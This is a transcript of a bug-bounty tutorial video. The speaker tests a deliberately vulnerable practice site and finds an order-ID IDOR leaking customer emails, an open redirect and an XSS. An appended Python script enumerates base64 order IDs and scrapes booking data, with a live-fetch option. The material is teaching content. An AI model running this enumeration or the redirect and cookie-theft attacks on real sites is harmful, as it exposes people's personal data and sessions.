Live Hacking Tutorial: How to Think Like a Bug Bounty Hunter

Captions
Okay, so hey guys, what's up, welcome to this new video. So in today's video we're going to attack a target like I would approach it in a bug bounty program or things like that. It's a target that has vulnerabilities, it's not a real target, but it's a real website that is online, so everybody can try this out. I'm going to try doing this for around 30 minutes and see what I can find in that time. If you guys want to see me continue on this website, just leave a comment down below and we'll go further on this website, but if you guys want to see me approaching a new target or different things, also just let me know and I will show you guys in the videos. So enough about this and let's start doing some hacking.

Okay guys, this is the target we are going to approach. First thing, make sure you have your Burp Suite on so we can capture some traffic and things like that. So I'm going to turn this on, and the first thing I usually do is just approach this target like you would approach a normal website. So we're just going to scroll around this website, we're going to push some buttons and we're going to do things like that. Okay, so let's just see this, this is the Fast Food Hacking page. We have Fast Food Hacking, and if you scroll a little bit down you can see there's a button right here; we can press this button and see where it brings us. Okay, we have this page. What I'm going to do is just try using this, so I'm just going to put in some basic things to try and trigger capturing some data. Let's do this and let's press the button. Okay, nothing special happens, but first things first, I also want to go back to where we were. So we go back here and we can scroll down, so we pressed this button, we tested some functionality behind this button, and we continue back on the first page we were on. So here are some CSS popups, it's all not clickable, so it's nothing interesting. We can scroll down a little bit, we have Battle of the Hackers, we find some hackers here. Let's scroll down some more because really nothing is clickable here. Okay, we have some blog thing and some JavaScript carousel thing, again nothing is really much clickable here.

Okay, so we go back up. First thing, we already checked out this Book Now button, so we go to the menu, maybe we can find something in here in the menu. Let's scroll down, let's just try and click everything, I'm just pushing buttons just to try and trigger something. We see we go to menu.php, so it's a PHP page; later we will see some of the webalizer. We're scrolling down, nothing clickable here, okay, no problem. We have All Locations, okay nice. Okay, what did we see happening? Something came up here, Return Home, so an extra button appeared. We cannot click this. What you can do probably is save names you find in a file, really names. What I like is team names, so you can open Notepad, open here, you can say this is Fast Food Hacking page and we find some team members, and the team members are Snowy and Sean. So team members usually are a little bit more interesting because if you find some login things or things like that, you can try putting in those names from the team members. Okay, but again nothing too interesting, we cannot click anything here, it's just going back to this location.php page, so it's not really interesting, and we have this Return Home button, we are back here. So we did test this one, we did test this one, we can now do this login.

Okay, so normally the first thing I do is, like a normal user, I want to register an account and test that functionality. The next thing I usually do is make a second account and I compare some things about these accounts, but like you see, we cannot register an account. So one thing we can do is say, here we have found the user, oh sorry, Sean, and we can try if there's something like "oh, this user exists but the password is not right", see if you can find some information. Oops, "please make sure"... okay. So at first sight nothing too special. What we can do now, there are two things from here: we can already look through our Burp and see every nice thing that we have found, and what we of course want to do maybe is set this one, but the thing I want to do first is go to our Linux machine. So we're going to log in on the Linux machine and we're just going to run a little scan in the background. So let's change directory, that's my mega directory, first fast food, change directory fast food, and what we're going to do here is scan this website. So I'm going back to this page, oh sorry, I was a little bit too... I'm going back to this page, we're going to copy this part and we go to the Linux machine and we're going to run a gobuster. First let's set this one as a target, so export target, and let's just give this one for a second to the target, and let's clear this up. Maybe I can expand this just a little, I hope you guys can see this well. So just a gobuster against the target, but the target is already full https and we don't need to go back to libraries, only one, and we can run it. Okay, what this will do already in the background, we have now the big text, it will look for directories and things like that we maybe can use. Like you see, it already found this API path, so you can just put it in here and you're going to say target URL, directory found, and then you can add this one here. So we found /api. This is not the wordlist I use normally, so I'm going to quickly change this to use the DirBuster directory-list-lowercase-medium. Okay wait, I was typing, directory lowercase medium, this one I use normally, it's a little bit bigger and it will find some more. So again it finds images, API, things like that. Just let this one run.

And next we're going to check out this part. Maybe what we can do is set this off for a second, because sometimes Google keeps producing some things that are not that interesting, and probably what you want to do is go to the target and just go to Fast Food Hacking, the first one, because we opened this as a second one. And what you can do is, I'm going to delete all these things for now because we don't need this for this scope, and we're going to open this part. Okay, so again here you see it finds the API with some things, we can look into this later, but what I want to see right now is the things from here, the engagement we did. Okay, so this is getting the page, I want to see some interesting things. We did a POST right here, we did this POST. It's always interesting to see what we are doing with this POST. What you always see is here you have Battle of the Hackers... no. What we can do is send this one to the Repeater already, and what you can do is send this one, see we have a Content-Length of five and we get back a number. Okay, really interesting, but what happens when we change this to "yes"? Let's say change this to "yes", it's the same Content-Length five, nothing special seems to change. Okay, what happens when we leave this and we don't do this, is it still going to work? It's still going to work. So okay, that's maybe something we can play with later, but what I already think is interesting is you get this part, so we're getting a number, so it's the reservation that we did make, so that's interesting. Let's go back and let's continue after the POST. So we get this GET, so it's going to say fast food hacking's confirm.php order, and then it's going to show this order. Okay, what is this? We can copy this URL, copy URL, and we can go to this page. Okay, and you see this is our order we did make, so we did the fake test.

But what we see when you go back to Burp, you see this part, this is very interesting, because we can copy this, we can put this in the Decoder, because I think this is going to be base64, we're going to decode this part and okay, it's a number. Okay, what I want to do right now is change this number, just one lower or one higher. Probably what you want to do is one lower, because you're going to be the last one that made this order. So what you want to try to do is lower this one and encode this back as base64, and we get back this base64, and I just want to copy everything of this. Okay, copy this, and we go back to this page and we're going to close this, we go back here, sorry, and we go into the Repeater. Oh, I didn't send that one to the Repeater, my bad, send this one to the Repeater, sorry. So you send it first to the Repeater, you're going to check this one out, you see this response, you will probably see a username, and you see here the fake test. What we are now going to do is change this one to the one we just created, we're going to send this again, and just to show you guys a little bit better what it's going to do, let's find the user again and we just find the ID, you see. I'm going to show you guys this way: copy the URL, we go back here, I'm going to paste this one, and like you see, we just find an email address. Probably what you want to do is find as many email addresses as you can, so these are booking emails, and you're going to save this, probably every email you get you want to save. What I would do if this was a real target and I wanted to look more into this, you create a little program that creates a lot of IDs. It's not that hard because you can easily do this in Python, and then you will scan all the IDs and in the program you will get all of these parts. So how you can do this easily is to look at this form, it's going to be in a form probably, let me see, okay, it's not in a form, so you're looking for these inputs. And what is this in the input? In every input on this page you're going to extract this value from the fname, the email, yeah, the date is not that really important. So you just make a little program. We can do this if you guys want to see me creating this little program, no problem, I'm not going to do this in this video because I want to find some more bugs, but you can ask me and I will show you how you can create the scraper to extract this data from a lot of IDs, just automated. It's a fun project, maybe I just make it, I will just make a video about it, because I think it's really interesting to see how you can automate these things. I'm going to take a little sip of water.

Okay, next let's watch our scan for a second, maybe it did find something. No, it just didn't find something really interesting, I'm going to stop this right now. It's images and API. We can try one more, we can try one more and that's common.txt, that's something... Nice, nice, you guys see, it's really important to run multiple scans. Like we found /admin.php, I think that one is really interesting. So again, oh, we find a robots.txt. So we have the /admin.php, we have images, I think it's not that interesting but let's save this for a second, we have the index.php, and we found the robots.txt, that's 160. Okay, what you also can do in here, what I probably always do, is I normally use Notion to take my notes, but for this, because I'm not going to take too many notes and I just want to show you guys, a notepad. But what you can do is create a to-do, and then we can say "make python scraper to find user booking user information", let's say user info, and what you probably want to do then is provide this one with the vulnerability link. So I'm going to provide this one with this, so I know okay, on this URL, oh yeah, this was the base64, this was an ID, I can make my Python program for that. So just to keep in mind, but we found some interesting things.

So what we're going to do is go back to this website, we go to this page, I'm going to turn on Burp Suite again because we found some new targets and I want to use my Burp Suite for this. So the first one I want to check out, because I like it, is admin.php. Wow, okay, and see, page is not found. Okay, maybe there's something more, so what we can do again is change the target to this and we're going to run this one again, I want to run this one on it, and maybe we can find some extra pages on this admin.php, maybe there are some things we can find. Just scanning things never hurts. Okay, but going back, we found some more. I think the robots.txt is the next thing we need to look into. robots.txt, do I miss something? Okay, oh okay, admin.php of course it returns, so let me really quickly watch this one, I want to see, because I was on the wrong... we get, ah, right here, admin.php, and it is a server, okay, we get some server information, also really interesting to note already. Like this is not that important for a bug bounty, because if you cannot exploit it it's not interesting, but if you can exploit it, it's interesting. What is this doing? So what I... really fast, I get this admin.php, okay, and it redirects me somehow instantly back to this index.php. But right now here we can also find the robots.txt, okay, and we find again two endpoints, and let's add this one again here. So we find /admin, just admin, and /go. Okay, interesting, because you have an admin.php and we have an admin page. No, no, I'm triggered and I want to just know, what is this admin page link? And again it's a 404 not found, but maybe we can, if the scan is not... oops, we can say export target, we can delete the .php, we can save this and we can run this one again. Okay, maybe we'll find something on the admin, maybe it's something different. Just scan it, always scan things. We also have this API endpoint, we will look into it a little bit later.

Okay, next thing, we want to go to the next page. Is my Burp still on? Still on. Next is the /go. Okay, redirects us immediately, well okay, go not found, okay, go.php, okay, it's trying to redirect immediately, so there's probably something wrong behind the scenes. Let me, when you see this, this one is really interesting. So what we want to do right here is look into that, let's scroll a bit down, we go to go and we have this part. Okay, we're going to send this one to the Repeater, so we're going to send this one more time, send, and it's saying "invalid return URL supplied". So it wants to redirect us, so what we can try to do is return_url=https://google.be, let's see what it's doing. Okay, it's a 200 OK, nothing special changed, so we can do this but it's not working. Okay, maybe we can try... now it's a bit of trial and error, because you see it wants a return URL, so it wants something. So now you need to think a little bit like a developer: return, maybe they make it this way, like I would do, "return", you know, but this is how you can name things in one language, underscores are how you name things in Python. So it's a little bit... okay, now you see there is a Location header. So let's try this, let's copy this part, let's go back here, let's go here, let's paste this, let's turn this one off for a second because I don't want to get every data from Google right now. Okay, nice, so we did a second finding and that is a redirect we can use. So what we can do with this is we can send this link I created here to a target, and oh, the target is thinking, oh nice, I'm going to bugbounty.com and I know that website, I trust that website, it's a safe website, but when we can change this and we can redirect the target to our evil website, we can gain some information from the target, we can steal cookies, we can steal data, we can make a hook, we can do a lot of things, so dangerous.

But there was something I don't really understand here, like what is this second part? Is this a second... so we can maybe create like, it's called type equals, let's change this just by one, let's send this one again. Okay, something changed, now we got a JavaScript code, that's pretty amazing, so we can trigger JavaScript now, I think. So can we, like, if we do, let's say, let me... oh, we can now do this probably. Like you see, we found some JavaScript code by changing this type. I have no idea what this type is doing, maybe we can visit, copy this URL again and visit this page to see if something changes in the... no, nothing changed, so it just triggers a different function or things like that. So what we're going to try to do is, because we have JavaScript here, JavaScript top.location.href, and we can modify this, I think we can use this to trigger some JavaScript. Let's say I want to create an alert, I want to steal some cookies, cookie from the target, for... oh sorry, okay, let's try and send this and let's see this part. So we have JavaScript, okay, this is nice, but this will not work because we have this part behind it. So can we comment this out? Maybe we also need to close this line with this... yeah, this looks better, if this part is not going to be filtered or anything somewhere. Let's copy this again and let's go back here. Okay nice, we just found an XSS vulnerability. Okay, this is amazing, this is really fun.

So what we did, just to recap the last few minutes: we found this redirect that is not working on the page. So when you go to this go page, what we found in our robots.txt, we found admin and we found this go page. If you go to this go page you will go to a redirect; this found a redirect that can be exploited, and found XSS in the JS code by changing the type. What I'm going to do with this part is make a sub-part for a second. Really important is that you understand your notes, that's the most important thing, and we're going to copy this again, I'm going to just paste it right here, just like this, so we understand this later on. We can use this to make a report and things like that, but it's really important you understand the things while you type in here. If you need more information, take also a screenshot. I always take screenshots normally and I paste them in my Notion; for this demo purpose I'm not doing this, but always take screenshots, it's a reminder. If you go back to this one day later you may forget some things, and then screenshots are really interesting.

Okay, we also found this part here, I'm always triggered when I see a JWT token. We can copy this, I don't understand what's going to be inside of it, but okay, it's out. So we can do jwt.io, I use this tool a lot, and we can just delete all this, I'm going to paste this one and it's empty, like you see. Another way to see this is using Burp Suite, and we can go to... I don't have the extension, okay, the extension is off, I'm going to turn that one off for a sec, I'm going to turn the JWT back on, back to Repeater, and normally I can now check things out. Let's send this one again, send to Repeater, Repeater, hmm, okay, Extensions, JWT Editor. Okay, normally you also can use this JWT Editor here inline, but there is something, maybe I need to restart it, I have no idea right now. Okay, but you can use the jwt.io also, it works really pretty nice. Okay, but no problem.

Okay, so we find already two things. Let's see how long we are already in this video, so maybe let's see if we find something here. No, nothing too special in this scan. We did this, I think for this video we found three vulnerabilities, maybe we're going to keep it this way. So we did find the order thing with the ID we can change, we find this vulnerability, and we find two vulnerabilities in the return on the go page, so you can first redirect to a malicious website and second of all you can also use a payload that triggers some JavaScript and you can perform a cross-site request forgery attack, XSS attack. So we found some server information, we found some of these things, and maybe next time we will go further. So next time when we continue I also will show you guys maybe how to make a Python script, I will make a full video of that, so that would be nice. Yeah, so this was this video, just to give you guys a little bit of information on how you can approach and attack a target. So first of all, try to use the website as well as possible, how a normal user would do it, click every button, press everything, and then you can scan a little, and next, really important, is just see everything that is being found, like the images are found here. Now you can really play with this website, and that's the beauty of it, how you want to do it. Now we have found some information, so next, what I probably will do, one of my favorite things next is this part. Next I would love to enumerate this API because I love API hacking. It's a part of web hacking but it's a different approach, you need to enumerate a lot of things, it can take some time to find targets, but if you find weaknesses in an API it can be really dangerous. So next up I think my approach will be this API target and making this Python script to try and get as much information from users and things like that, and maybe I can even try to see if these users have an account. Why can you do that? We found this one user that made an order, does this user have an account, is this a username, do we get a different response, things like that. Okay, there's no different response, so we don't have that much information, but we can work on this, but that's for the next video. I hope you guys like this a little bit and I see you guys back in the next one, bye.
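The scraper the speaker describes but does not write in this video, as an added example (written for this page, not code from the video or the CyberSquad channel): it walks the base64-encoded order IDs downward from your own order, fetches each confirm page and pulls the fname/email/date values out of the <input> tags. The URL path and parameter name (confirm.php?order=<base64 of the decimal id>) and the exact input names are assumptions taken from what is said in the video, not confirmed by the target; the pages below are constructed so the script runs offline, and a live fetcher is included for a real engagement.

```python
"""Enumerate base64-encoded order IDs and scrape the booking fields.

Added example, not the video's own code. Assumptions (not confirmed by the
video): the order page is  confirm.php?order=<base64(decimal order id)>  and
the booking data sits in <input name="fname"|"email"|"date" value="...">.
"""
import base64
from html.parser import HTMLParser
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

BASE_URL = "https://example.test/confirm.php"  # assumed; replace with the real target
FIELDS = ("fname", "email", "date")            # input names mentioned in the video


def encode_order_id(order_id: int) -> str:
    """The video's Decoder step in reverse: decimal id -> base64 token."""
    return base64.b64encode(str(order_id).encode("ascii")).decode("ascii")


def decode_order_id(token: str) -> int:
    """base64 token -> decimal id; raises ValueError on junk input."""
    return int(base64.b64decode(token, validate=True).decode("ascii"))


def order_url(order_id: int, base: str = BASE_URL) -> str:
    return base + "?" + urlencode({"order": encode_order_id(order_id)})


class InputCollector(HTMLParser):
    """Collects name -> value for every <input> on the page (no <form> needed)."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() != "input":
            return
        a = dict(attrs)
        if a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def extract_booking(html: str) -> Optional[Dict[str, str]]:
    """Return the booking fields, or None when the page carries no email input."""
    p = InputCollector()
    p.feed(html)
    if "email" not in p.fields:
        return None
    return {k: p.fields.get(k, "") for k in FIELDS}


Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status, body)


def enumerate_orders(fetch: Fetcher, own_order_id: int, count: int) -> Dict[int, Dict[str, str]]:
    """Walk downward from your own (newest) order id, as suggested in the video."""
    found: Dict[int, Dict[str, str]] = {}
    for oid in range(own_order_id, own_order_id - count, -1):
        if oid < 1:
            break
        status, body = fetch(order_url(oid))
        if status != 200:
            continue
        rec = extract_booking(body)
        if rec:
            found[oid] = rec
    return found


# Constructed sample pages standing in for the target (offline run).
_FAKE_PAGES = {
    42: '<input type="text" name="fname" value="faketest"><input name="email" '
        'value="me@attacker.test"><input name="date" value="2023-11-13">',
    41: '<input name="fname" value="Sean"><input name="email" value="sean@example.test">'
        '<input name="date" value="2023-11-12">',
    40: "<html><body>Order not found</body></html>",  # no inputs -> skipped
    39: '<input name="fname" value="Snowy"><input name="email" value="snowy@example.test">',
}


def fake_fetch(url: str) -> Tuple[int, str]:
    token = parse_qs(urlparse(url).query)["order"][0]
    oid = decode_order_id(token)
    return (200, _FAKE_PAGES[oid]) if oid in _FAKE_PAGES else (404, "")


def live_fetch(url: str) -> Tuple[int, str]:
    """Real fetcher for an in-scope target; swap in for fake_fetch."""
    import urllib.request
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    for oid, rec in enumerate_orders(fake_fetch, 42, 5).items():
        print(oid, encode_order_id(oid), rec)
```

Against a real program, keep the ID range small, add a delay between requests and stay inside the scope rules; the point of the script is to show that the base64 wrapper adds no protection and that each ID leaks another customer's booking, which is what the report needs to say.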
Info
Channel: CyberSquad
Views: 109,631
Keywords: bug bounty, hacking tutorial, cybersecurity, ethical hacking, bug hunting, penetration testing, security researcher, hacker, white hat hacker, infosec, computer security, SQL injection, XSS, CSRF, RCE, LFI, SSRF, open redirect, path traversal, file inclusion, denial of service, authentication bypass, authorization bypass, web application security, mobile security, API security, vulnerability research, bug bounty tips, bug bounty training, bug bounty tools, bug bounty programs
Id: EpJ8qvngs8c
Length: 33min 39sec (2019 seconds)
Published: Mon Nov 13 2023